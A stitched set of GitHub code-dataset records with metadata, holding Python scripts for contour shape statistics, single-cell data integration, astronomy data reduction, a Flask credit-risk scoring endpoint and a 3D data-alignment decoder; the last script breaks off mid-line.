https://matplotlib.org/3.3.1/tutorials/introductory/customizing.html\n\t'''\n\tplt.rcParams['mathtext.fontset'] = 'stix'\n\tplt.rcParams['font.family'] = 'Arial'\n\tplt.rcParams['xtick.labelsize'] = 8\n\tplt.rcParams['ytick.labelsize'] = 8\n\n\n\n@_process_mulitple_contours\ndef shuffle_points(r):\n\t'''\n\tRandomly shuffle contour points.\n\t\n\tNotes:\n\t\n\t* Shuffled points are not ordered along the contour.\n\t* This function is useful for testing robustness to arbitrary point ordering.\n\t\n\tInputs:\n\t\n\t* r : a single contour as an (n,2) array or multiple contours as an (m,) or (m,n,2) array\n\t\n\tOutputs: \n\t\n\tr_shuffled : array of shuffled contour points, same array shape as r\n\t'''\n\tn = r.shape[0] # number of points\n\tind = np.random.permutation(n)\n\treturn r[ind]\n\n\n\ndef sse(r0, r1):\n\t'''\n\tCalculate pointwise sum-of-squared-error (SSE) between two contour shapes.\n\t\n\tInputs:\n\t\n\t* r0 : a single contour as an (n,2) array\n\t* r1 : a single contour as an (n,2) array\n\t\n\tOutputs: \n\t\n\tsse_value : the sum-of-squared distances between contour points\n\t'''\n\treturn (np.linalg.norm(r1-r0, axis=1)**2).sum()\n\n\n\ndef two_sample_test(r0, r1, alpha=0.05, parametric=True, iterations=-1):\n\t'''\n\tConduct a two-sample test 
comparing two groups of contours.\n\t\n\tNotes:\n\t\n\t* This function conducts mass-multivariate statistical analysis using statistical parametric mapping (SPM)\n\t* The \"iterations\" keyword argument is used only if \"parametric\" is False\n\t* Setting \"iterations\" to -1 will conduct all possible permutations of the data\n\t* As a rule-of-thumb, 10000 iterations is usually sufficient to achieve numerical stability\n\t* For small samples there may be fewer than 10000 unique permutations; in this case it is advisable to conduct all possible permutations\n\t\n\tInputs:\n\t\n\t* r0 : contours for one group as an (m,n,2) array\n\t* r1 : contours for a second group as an (m,n,2) array\n\t* alpha : float, Type I error rate (default: 0.05)\n\t* parametric : bool, whether to conduct parametric (True) or nonparametric (False) inference\n\t* iterations : int, number of iterations for nonparametric (permutation) inference; default: -1\n\t\n\tReferences:\n\t\n\t* Taylor, J. E., & Worsley, K. J. (2008). Random fields of multivariate test statistics, with applications to shape analysis. Annals of Statistics, 36(1), 1–27. http://doi.org/10.1214/009053607000000406\n\t* Chung, M. K., Worsley, K. J., Nacewicz, B. M., Dalton, K. M., & Davidson, R. J. (2010). General multivariate linear modeling of surface shapes using SurfStat. NeuroImage, 53(2), 491–505. http://doi.org/10.1016/j.neuroimage.2010.06.032\n\t'''\n\tif parametric:\n\t\tspm = spm1d.stats.hotellings2(r0, r1).inference(alpha)\n\t\tz,zc = spm.z, spm.zstar\n\t\tp = spm1d.rft1d.T2.sf(z.max(), spm.df, spm.Q, spm.fwhm, withBonf=True)\n\telse:\n\t\tspm = spm1d.stats.nonparam.hotellings2(r0, r1).inference(alpha, iterations=iterations)\n\t\tz,zc = spm.z, spm.zstar\n\t\tpdf = spm.PDF0 # permutation distribution\n\t\tp = ( pdf >= z.max()).mean() # p value (proportion of values in pdf greater than or equal to T2max)\n\tm0,m1 = r0.mean(axis=0), r1.mean(axis=0)\n\treturn TwoSampleSPMResults(m0, m1, z, alpha, zc, p)\n\n\n\ndef write_csv(filename, r):\n\t'''\n\tWrite contour shapes as a CSV file.\n\t\n\tInputs:\n\t\n\t* filename : full path to an output CSV file\n\t* r : multiple contours as an (m,) or (m,n,2) array\n\t'''\n\twith open(filename, 'w') as f:\n\t\tf.write('Shape,X,Y\\n')\n\t\tfor i,rr in enumerate(r):\n\t\t\tfor x,y in rr:\n\t\t\t\tf.write('%d,%.6f,%.6f\\n' %(i+1,x,y))", "repo_name": "0todd0000/lmfree2d", "sub_path": "Python/lmfree2d.py", "file_name": "lmfree2d.py", "file_ext": "py", "file_size_in_byte": 24774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 182, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Axes", "line_number": 202, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "numpy.any", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Axes", "line_number": 234, "usage_type": "attribute"}, {"api_name": 
"matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 300, "usage_type": "call"}, {"api_name": "unipath.Path", "line_number": 310, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 310, "usage_type": "call"}, {"api_name": "os.path", "line_number": 310, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 479, "usage_type": "attribute"}, {"api_name": "numpy.roll", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 506, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 508, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 537, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 569, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 570, "usage_type": "call"}, {"api_name": "pycpd.RigidRegistration", "line_number": 601, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 635, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 635, "usage_type": "attribute"}, {"api_name": "scipy.spatial.spatial.procrustes", "line_number": 636, "usage_type": "call"}, {"api_name": "scipy.spatial.spatial", "line_number": 636, "usage_type": "attribute"}, {"api_name": "scipy.spatial", "line_number": 636, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 675, "usage_type": "call"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 676, "usage_type": "call"}, {"api_name": "networkx.from_scipy_sparse_matrix", "line_number": 678, "usage_type": "call"}, {"api_name": "networkx.dfs_preorder_nodes", "line_number": 679, "usage_type": "call"}, {"api_name": "networkx.dfs_preorder_nodes", "line_number": 682, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 683, "usage_type": "attribute"}, {"api_name": "geomdl.fitting.interpolate_curve", "line_number": 727, "usage_type": "call"}, {"api_name": "geomdl.fitting", "line_number": 727, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 729, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 743, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 743, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 744, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 744, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 745, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 745, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 746, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 746, "usage_type": "name"}, {"api_name": "numpy.random.permutation", "line_number": 769, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 769, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 787, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 787, "usage_type": "attribute"}, {"api_name": "spm1d.stats.hotellings2", "line_number": 817, "usage_type": "call"}, {"api_name": "spm1d.stats", "line_number": 817, "usage_type": "attribute"}, {"api_name": "spm1d.rft1d.T2.sf", "line_number": 819, "usage_type": "call"}, {"api_name": "spm1d.rft1d", "line_number": 819, "usage_type": "attribute"}, {"api_name": "spm1d.stats.nonparam.hotellings2", "line_number": 821, "usage_type": "call"}, {"api_name": "spm1d.stats", "line_number": 821, "usage_type": "attribute"}]} +{"seq_id": "12124907588", "text": "import scanpy as sc \nimport matplotlib\nimport argparse\nmatplotlib.use(\"Agg\")\nfrom scDML import scDMLModel\n# import os \n# os.system(\"clear\")\n\nmethod=\"scDML\"\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset',type=str,required=True, help='dataset name')\nparser.add_argument(\"--filepath\",type=str,required=True,help=\"folder path of stored data\")\nparser.add_argument(\"--ncelltype\",type=int,required=True,help=\"number of celltype in dataset\")\nparser.add_argument(\"--K_in\",type=int,default=5,help=\"K value to calculate KNN pair\")\nparser.add_argument(\"--K_bw\",type=int,default=10,help=\"K value to calculate MNN pair\")\nparser.add_argument(\"--cluster_method\",type=str,default=\"louvain\",help=\"clustering algorithm to initize cluster label\")\nparser.add_argument(\"--resolution\",type=float,default=3.0,help=\"resolution of clustering algorithm\")\nparser.add_argument(\"--n_hvg\",type=int,default=1000,help=\"number of highly variable genes to be selected\")\nparser.add_argument(\"--verbose\",type=bool,default=True,help=\"print additional information\")\nparser.add_argument(\"--savedir\",type=str,required=True,help=\"where to save data\")\nparser.add_argument(\"--save\",type=bool,default=True,help=\"whether to save data\")\nprint(\"method=\",method)\nargs=parser.parse_args() \nprint(\"dataset=\",args.dataset)\ndataset=args.dataset\nfilepath=args.filepath\nncelltype=args.ncelltype\nK_in=args.K_in\nK_bw=args.K_bw\ncluster_method=args.cluster_method\nresolution=args.resolution\nn_hvg=args.n_hvg\nverbose=args.verbose\nsavedir=args.savedir\nsave=args.save\nsave_figdir=savedir\n\ndataset_path=filepath+\"/\"+dataset+\"_raw.h5ad\"# \nadata_raw=sc.read(dataset_path)\nsc.settings.figdir=save_figdir+dataset+\"/\"+method+\"/\"\n\nmethod=\"scDML\"\nscdml=scDMLModel(save_dir=save_figdir+dataset+\"/\"+method+\"/\")\n\nadata=scdml.preprocess(adata_raw,cluster_method=cluster_method,resolution=resolution,n_high_var=n_hvg)\n#print(adata)\nscdml.integrate(adata,batch_key=\"BATCH\",ncluster_list=[ncelltype],K_in=K_in,K_bw=K_bw,\n expect_num_cluster=ncelltype,merge_rule=\"rule2\")\nadata.obs[\"cluster_celltype\"]=adata.obs[\"reassign_cluster\"].copy()\n# 
visualization \n#####################################################\nsc.pp.neighbors(adata,random_state=0,use_rep=\"X_emb\")\nsc.tl.umap(adata)\n#####################################################\n\nsc.pl.umap(adata,color=[\"BATCH\",\"celltype\"],save=\"_\"+dataset+\"_\"+method+\"_corrected.png\")\nadata.write(savedir+dataset+\"/\"+method+\"/\"+dataset+\"_\"+method+\"_corrected.h5ad\")\n\n\n\n\n", "repo_name": "eleozzr/scDML_reproduce", "sub_path": "Method_script/scDML/scDML_script.py", "file_name": "scDML_script.py", "file_ext": "py", "file_size_in_byte": 2468, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "scanpy.read", "line_number": 39, "usage_type": "call"}, {"api_name": "scanpy.settings", "line_number": 40, "usage_type": "attribute"}, {"api_name": "scDML.scDMLModel", "line_number": 43, "usage_type": "call"}, {"api_name": "scanpy.pp.neighbors", "line_number": 52, "usage_type": "call"}, {"api_name": "scanpy.pp", "line_number": 52, "usage_type": "attribute"}, {"api_name": "scanpy.tl.umap", "line_number": 53, "usage_type": "call"}, {"api_name": "scanpy.tl", "line_number": 53, "usage_type": "attribute"}, {"api_name": "scanpy.pl.umap", "line_number": 56, "usage_type": "call"}, {"api_name": "scanpy.pl", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "73020786434", "text": "from astropy.io import ascii\nimport multiprocessing as mp\nimport numpy as np\nfrom os.path import isfile\nfrom typing import Callable\nfrom vip_hci.fits import open_fits, write_fits\n\nnumworkers = 8 # number of worker threads/processes\nnumcomps = 10 # number of PCA components\neverynthframe = 20 # number of frames 'n' selected from data cube\nchunksize = 20\npxscale = 0.035\n\ndef init(data_paths: list[str], wavelengths_path: str, angles_path: str, channels: list[int]=..., frames: list[int]=...) -> tuple[np.ndarray, np.ndarray, np.ndarray]:\n '''\n Get all data given the specified frames and channels to use.\n\n Returns a 4D data cube associated with all channels and frames, a list of\n angles that correspond to the frames, and a list of wavelengths that\n correspond to the channels.\n '''\n\n # >>>> figure out why angles are not the double precision as in the file\n\n # load data cube for each desired channel and frame as 4D cube\n cubes = loadall(data_paths)[:, frames].copy()\n\n # get list of wavelengths for proper calibration and scaling\n wavelengths = loadtbl(wavelengths_path, index=channels)\n\n # get list of angles for de-rotation\n angles = loadtbl(angles_path, index=frames)\n\n return cubes, wavelengths, angles\n\ndef loadtbl(path: str, index: list[int]=...) 
-> np.ndarray:\n table = ascii.read(path, format=\"no_header\", data_start=0)\n data = table[\"col1\"].data[index].copy()\n return data\n\n# >>>> add function to just open data instead of doing it w/in redux fn\ndef loadone(path: str, verbose: bool=False) -> np.ndarray:\n return open_fits(path, verbose=verbose)\n\ndef loadall(paths: list[str], verbose: bool=False) -> np.ndarray:\n with mp.Pool(numworkers) as pool:\n return np.array(pool.starmap(loadone, zip(paths, np.repeat([verbose], len(paths)))))\n\n# save numpy array to specified path as .FITS file\ndef to_fits(data: np.ndarray, path: str, overwrite: bool=True) -> None:\n if isfile(path) and overwrite or not isfile(path):\n write_fits(path, data)\n\n# save numpy array to specified path as .npy file\ndef to_npy(data: np.ndarray, path: str, overwrite: bool=True) -> None:\n if isfile(path) and overwrite or not isfile(path):\n np.save(path, data)\n\ndef make_name(lib: str, algo: str, sub_type: str, first_chnl: str, last_chnl: str, ncomp: int=None, nskip_frames: int=None) -> str:\n if ncomp is None:\n ncomp = numcomps\n if nskip_frames is None:\n nskip_frames = everynthframe\n \n algo_text = algo if \"PCA\" not in algo else \"PCA%03i\"%ncomp\n name = f\"{lib}{algo_text}-{sub_type}_{first_chnl}-{last_chnl}_skip{nskip_frames}\"\n return name\n\ndef combine(channels: np.ndarray,\n combine_fn: Callable[[np.ndarray], np.ndarray]=np.median,\n out_path: str=None) -> np.ndarray:\n \n adi_combined = combine_fn(channels, axis=0)\n\n if out_path is not None:\n to_fits(adi_combined, out_path)\n\n return adi_combined", "repo_name": "asatk/exoadi", "sub_path": "mypkg/redux/redux_utils.py", "file_name": "redux_utils.py", "file_ext": "py", "file_size_in_byte": 2947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "attribute"}, {"api_name": "astropy.io.ascii.read", "line_number": 37, "usage_type": "call"}, {"api_name": "astropy.io.ascii", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 36, "usage_type": "attribute"}, {"api_name": "vip_hci.fits.open_fits", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 42, "usage_type": "attribute"}, {"api_name": "multiprocessing.Pool", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 51, "usage_type": "call"}, {"api_name": "vip_hci.fits.write_fits", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 69, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 71, "usage_type": "attribute"}]} +{"seq_id": "73508993474", "text": "import os\nfrom flask import Request, Response\nimport pandas\nimport 
pickle\nimport numpy\n\nABSOLUTE_PATH = os.getcwd()\n\n\n# load the path where the credit risk model is stored\nRELATIVE_PATH_RISK = '/models/scorecard_model.pickle'\n\nMODEL_PATH = ABSOLUTE_PATH + RELATIVE_PATH_RISK\n\n# load the credit risk model\npickle_model = pickle.load(open(MODEL_PATH, 'rb'))\n\n\nmin_score = 300\nmax_score = 850\n\n\ndef condition(predicted_value): return predicted_value[1]\n\n\ndef get_risk_data_post(request: Request):\n file_uploaded = request.files[\"file\"]\n\n # define the test data\n test_data = pandas.read_csv(file_uploaded, sep=r\",|;\", engine='python')\n\n print(test_data)\n\n prediccion = pickle_model.score(test_data)\n\n result_prediccion = pandas.Series(prediccion)\n result_prediccion = result_prediccion.astype(numpy.int64)\n\n return result_prediccion.to_json(orient=\"table\")\n\n\ndef get_risk_data_get():\n return Response('The request must be made using the POST method', status=400)\n", "repo_name": "jumarinr/endpoints_tae", "sub_path": "api/predict_risk.py", "file_name": "predict_risk.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.Request", "line_number": 26, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.Response", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "44750634397", "text": "import numpy as np, numpy.matlib # numpy.matlib must be imported explicitly for the np.matlib.repmat calls below\r\nfrom scipy.signal import find_peaks\r\nfrom scipy.linalg import sqrtm\r\nimport time\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.manifold import MDS\r\nfrom sklearn.decomposition import FactorAnalysis\r\nfrom sklearn.manifold import Isomap\r\nfrom sklearn.neighbors import NearestNeighbors\r\nimport matplotlib.pyplot as plt\r\nfrom decoder import utils\r\n\r\n\r\ndef run_DAD_3D(X_train, Y_test, T_train, X_test, T_test, grid_size=5, dim_red_method=\"PCA\", num_T=0, check_2D=False):\r\n k = 3 # align in 3 dimensions\r\n\r\n if (k == 3) and (np.size(X_train, 1) == 2):\r\n X_train = map_X_3D(X_train)\r\n\r\n X_n = normal(X_train)\r\n Y_r = remove_const_cols(Y_test)\r\n\r\n t1 = time.time()\r\n V_r = compute_V(Y_r, map_X_3D(X_test), T_test, d=k, methods=[dim_red_method])\r\n t2 = time.time()\r\n\r\n print(f'Finished computing the low-d embedding in {(t2 - t1) / 60:.2f} minutes.')\r\n\r\n X_rec = []\r\n V_out = []\r\n V_flip = []\r\n min_KL = []\r\n\r\n for i in range(len(V_r)):\r\n X_rec_tmp, V_out_tmp, V_flip_tmp, min_KL_tmp = DAD_3D_search(X_n, normal(V_r[i]), grid_size, num_T, check_2D)\r\n X_rec.append(X_rec_tmp)\r\n V_out.append(V_out_tmp)\r\n V_flip.append(V_flip_tmp)\r\n min_KL.append(min_KL_tmp)\r\n\r\n return np.array(X_rec)[0, :, :]\r\n\r\n\r\ndef map_X_3D(X):\r\n return np.column_stack((X[:, 0], X[:, 1], np.linalg.norm(X, axis=1)))\r\n\r\n\r\ndef normal(X):\r\n mean_X = np.mean(X, axis=0)\r\n cov_X = np.cov(X, rowvar=False)\r\n X_n = X\r\n #for col in range(X.shape[1]):\r\n # X_n[:, col] = (X_n[:, col] - mean_X[col]) / np.sqrt(cov_X[col, col])\r\n return np.matmul(X_n - mean_X, np.linalg.inv(sqrtm(cov_X)))\r\n\r\n\r\ndef remove_const_cols(Y):\r\n return Y[:, ~np.all(Y[1:] == Y[:-1], axis=0)]\r\n\r\n\r\ndef 
compute_V(Y, X_test, T_test, d=3, methods=['PCA', 'MDS', 'FA', 'Isomap']):\r\n L = len(methods)\r\n V = []\r\n for idx in range(L):\r\n if methods[idx] == 'PCA':\r\n pca = PCA(n_components=d)\r\n V.append(pca.fit_transform(Y))\r\n elif methods[idx] == 'MDS':\r\n mds = MDS(n_components=d)\r\n V.append(mds.fit_transform(Y))\r\n elif methods[idx] == 'FA':\r\n fa = FactorAnalysis(n_components=d)\r\n V.append(fa.fit_transform(Y))\r\n elif methods[idx] == 'Isomap':\r\n isomap = Isomap(n_components=d)\r\n V.append(isomap.fit_transform(Y))\r\n\r\n plt.figure(figsize=(8,6))\r\n plt.subplot(1, 2, 1)\r\n utils.color_data(X_test, T_test)\r\n plt.title('Ground Truth')\r\n plt.subplot(1, 2, 2)\r\n utils.color_data(V[0], T_test)\r\n plt.title(methods[0]) # label the panel with the method actually plotted\r\n plt.show()\r\n\r\n return V\r\n\r\n\r\ndef DAD_3D_search(X_n, V_r, grid_size=8, num_T=1, check_2D=False):\r\n t1 = time.time()\r\n V_out = grid_search_3D_KL(X_n, V_r, grid_size, num_T)\r\n t2 = time.time()\r\n\r\n print(f'Finished performing 3D alignment in {(t2 - t1) / 60:.2f} minutes.')\r\n\r\n num_ang = 90\r\n\r\n t1 = time.time()\r\n X_rec_3D, V_flip_3D, y_3D, inds_3D = rotated_KL_min(V_out[:, 0:2], X_n[0:2, :], num_ang)\r\n t2 = time.time()\r\n\r\n print(f'Finished performing the final 2D rotation in {(t2 - t1) / 60:.2f} minutes.')\r\n\r\n if check_2D:\r\n X_rec_2D, V_flip_2D, y_2D, inds_2D = rotated_KL_min(V_r[:, 0:2], X_n[:, 0:2], num_ang)\r\n\r\n if np.amin(y_3D[inds_3D]) < np.amin(y_2D[inds_2D]):\r\n X_rec = X_rec_3D\r\n min_KL = y_3D[inds_3D]\r\n else:\r\n X_rec = X_rec_2D\r\n min_KL = y_2D[inds_2D]\r\n V_out = V_r\r\n\r\n V_flip = []\r\n sort_inds = np.argsort(np.hstack((y_2D[inds_2D], y_3D[inds_3D])))\r\n\r\n for i in range(10):\r\n if sort_inds[i] < inds_2D.size:\r\n V_flip.append(V_flip_2D[sort_inds[i]])\r\n else:\r\n V_flip.append(V_flip_3D[sort_inds[i]])\r\n\r\n else:\r\n V_flip = V_flip_3D\r\n X_rec = X_rec_3D\r\n min_KL = y_3D[inds_3D]\r\n\r\n return X_rec, V_out, V_flip, min_KL\r\n\r\n\r\ndef grid_search_3D_KL(X_target, Y_source, num_A, num_T):\r\n mean_weight = 0.7\r\n KL_thr = 5\r\n nz_var = 0.5\r\n fine_grid = 10\r\n bsz = 50\r\n num_samples = 500000\r\n k0 = k1 = 5\r\n grid_size = num_A\r\n\r\n xx, yy, zz = np.meshgrid(np.linspace(-1, 1, grid_size), np.linspace(-1, 1, grid_size), np.linspace(-1, 1, grid_size))\r\n\r\n F_mat = np.column_stack((xx.flatten('F'), yy.flatten('F'), zz.flatten('F')))\r\n F_mat = np.concatenate((np.array([0, 0, 1])[np.newaxis, :], F_mat[np.linalg.norm(F_mat, ord=2, axis=1) > 0.1, :]), axis=0)\r\n\r\n if num_T > 1:\r\n t_vec = np.vstack(([0, 0, 0], np.random.randn(num_T, 3) * nz_var))\r\n else:\r\n t_vec = np.array([0, 0, 0])\r\n\r\n sample_loc = sample_from_3D_grid(bsz, num_samples)\r\n p_train = prob1(sample_loc, normal(X_target), k0)\r\n\r\n try:\r\n dists1 = np.load('dists1.npy')\r\n except IOError:\r\n if num_T > 0:\r\n dists1 = np.full((F_mat.shape[0], num_T if num_T > 1 else 1), 0.0)\r\n else:\r\n dists1 = np.full(F_mat.shape[0], 0.0)\r\n\r\n for i in range(F_mat.shape[0]):\r\n an0 = F_mat[i, :]\r\n Y_rot = rotate_data(Y_source, an0)\r\n\r\n p_rot = prob1(sample_loc, normal(Y_rot), k1)\r\n\r\n if num_T > 0:\r\n dists1[i, 0] = np.matmul(p_rot.T, np.log(p_rot / p_train))\r\n if dists1[i, 0] < KL_thr and num_T > 1:\r\n for j in range(1, num_T):\r\n Y_rot2 = Y_rot + t_vec[j, :]\r\n p_rot = prob1(sample_loc, Y_rot2, k1)\r\n dists1[i, j] = np.matmul(p_rot.T, np.log(p_rot / p_train))\r\n\r\n KL_thr = min(KL_thr, np.mean(dists1[dists1 != 100]) * mean_weight)\r\n else:\r\n dists1[i] = np.matmul(p_rot, np.log(p_rot / 
p_train))\r\n\r\n np.save('dists1.npy', dists1)\r\n plt.plot(dists1)\r\n plt.title('3D Grid Search')\r\n plt.xlabel('Rotation Angle')\r\n plt.ylabel('KL Divergence')\r\n plt.show()\r\n # select best angle of rotation\r\n values = np.amin(dists1, axis=0)\r\n ind = np.argmin(dists1, axis=0)\r\n\r\n if num_T > 1:\r\n ind = ind[np.argmin(values)]\r\n\r\n angle_ind = ind\r\n\r\n an0 = F_mat[angle_ind, :]\r\n Y_curr = rotate_data(Y_source, an0)\r\n\r\n if num_T > 1:\r\n t_curr = t_vec[ind, :]\r\n else:\r\n t_curr = [0, 0, 0]\r\n\r\n # final translation\r\n t_vec2 = np.random.randn(np.power(fine_grid, 3), 3) * nz_var + np.matlib.repmat(t_curr, np.power(fine_grid, 3), 1)\r\n\r\n dists2 = np.zeros(t_vec2.shape[0])\r\n for i in range(t_vec2.shape[0]):\r\n Y_rot2 = Y_curr + np.matlib.repmat(t_vec2[i, :], Y_curr.shape[0], 1)\r\n nbrs = NearestNeighbors(n_neighbors=1).fit(X_target)\r\n distances, dvec = nbrs.kneighbors(Y_rot2)\r\n dists2[i] = np.mean(dvec)\r\n\r\n ind = np.argmin(dists2)\r\n return Y_curr + np.matlib.repmat(t_vec2[ind,:], Y_curr.shape[0], 1)\r\n\r\n\r\ndef sample_from_3D_grid(bsz, num_samples, x_min=-4, x_max=4, y_min=-4, y_max=4, z_min=-4, z_max=4):\r\n x1, y1, z1 = np.meshgrid(np.linspace(x_min, x_max, bsz - 1), np.linspace(y_min, y_max, bsz - 1), np.linspace(z_min, z_max, bsz - 1))\r\n x_t = np.column_stack((x1.flatten('F'), y1.flatten('F'), z1.flatten('F')))\r\n N = x_t.shape[0]\r\n\r\n return x_t[np.random.permutation(N)[0:min(num_samples, N)], :]\r\n\r\n\r\ndef prob1(X1, x_t, k=1):\r\n nbrs = NearestNeighbors(n_neighbors=k).fit(x_t)\r\n distances, indices = nbrs.kneighbors(X1)\r\n rho_X1 = distances[:, -1]\r\n p1 = k / (X1.shape[0] * np.power(rho_X1, np.full(rho_X1.shape[0], x_t.shape[1])))\r\n return p1 / p1.sum()\r\n\r\n\r\ndef rotate_data(Y_curr, an0):\r\n an0 = an0 / np.linalg.norm(an0)\r\n v1 = [0, 0, 1]\r\n if np.array_equal(v1, an0):\r\n rot_mat = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])\r\n elif np.array_equal(v1, -an0):\r\n rot_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, -1]])\r\n else:\r\n rot_mat = np.array([[np.dot(v1, an0), -np.linalg.norm(np.cross(v1, an0)), 0], [np.linalg.norm(np.cross(v1, an0)), np.dot(v1, an0), 0], [0, 0, 1]])\r\n basis_mat = np.column_stack((v1, (an0 - v1) / np.linalg.norm(an0 - v1), np.cross(an0, v1)))\r\n try:\r\n rot_mat = np.matmul(np.matmul(basis_mat, rot_mat), np.linalg.inv(basis_mat))\r\n except np.linalg.LinAlgError:\r\n print(an0)\r\n print(basis_mat)\r\n\r\n Y_rot = np.matmul(Y_curr, rot_mat.T)\r\n return Y_rot - np.mean(Y_rot)\r\n\r\n\r\ndef rotated_KL_min(V, X_tr, num_A, fit_skew=0):\r\n k = 3\r\n num_peaks = 10\r\n\r\n if V.shape[1] != X_tr.shape[0]:\r\n print(V.shape, X_tr.shape)\r\n print('Target & test set are not the same dimension!')\r\n\r\n ang_vals = np.linspace(0, np.pi, num_A)\r\n cos_g = np.cos(ang_vals)\r\n sin_g = np.sin(ang_vals)\r\n VL_r = []\r\n y = np.zeros(2 * num_A)\r\n for p in range(2 * num_A):\r\n pm = p % num_A\r\n ps = 2 * np.floor((p-1) / num_A) - 1\r\n rm = np.matmul([[ps, 0], [0, 1]], [[cos_g[pm], -sin_g[pm]], [sin_g[pm], cos_g[pm]]])\r\n\r\n if fit_skew != 0:\r\n sx = 0.2 + 0.2 * np.arange(1, 8)\r\n sy = 0.2 + 0.2 * np.arange(1, 